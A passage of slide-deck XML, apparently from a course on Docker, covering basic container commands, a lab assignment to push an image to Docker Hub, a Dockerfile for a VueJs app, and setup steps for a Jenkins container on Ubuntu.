            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> So external service can talk to container and vice versa.</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run = docker pull + docker create + docker start</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nodemon -L &lt;script_file&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker logs -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;container_name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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289"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235500" y="954000"/>
            <a:ext cx="8520600" cy="4118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b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. We will Create a Docker Hub Account</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Download the image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Create a container from image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Start the created container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. Go inside the container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7. Exit from container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8. Stop the running container/ Re Run it</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9. Upload the image to docker hub.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		9.1  Public Mode (Unlimited Repo)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		9.2  Private Mode (1 Repo in free version) (Paid min charge $5/Mo. Unlimited Repo)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10. Student will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> my Docker Hub image onto their machine,build it, launch it and submit the screenshot to me</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1787" name="Google Shape;1787;p289"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2950">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Practical Lab Assignment 1</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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290"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="4205700" cy="41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D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> node:lts-alpine  </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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm install -g http-server</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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WORKDIR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> /app</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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> package*.json ./</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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm install</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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> . .</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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>RUN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> npm run build</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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 sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>EXPOSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="42B983"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>"http-server"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="42B983"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>"dist"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="525252"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> ]</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1793" name="Google Shape;1793;p290"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2950">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a VueJs Container using Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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291"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573075" y="704400"/>
            <a:ext cx="7603200" cy="4102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sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="27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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo apt install openjdk-17-jre</a:t>
            </a:r>
            <a:endParaRPr sz="27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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>java  - - version</a:t>
            </a:r>
            <a:endParaRPr sz="27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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>apt install curl -y</a:t>
            </a:r>
            <a:endParaRPr sz="27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27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t/>
            </a:r>
            <a:endParaRPr sz="5550">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1799" name="Google Shape;1799;p291"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="53350"/>
            <a:ext cx="7790100" cy="704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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a Jenkins Container</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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292"/>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How to install jenkins on a ubuntu linux os ?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1805" name="Google Shape;1805;p2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440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1520">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y systemd</a:t>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1520">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
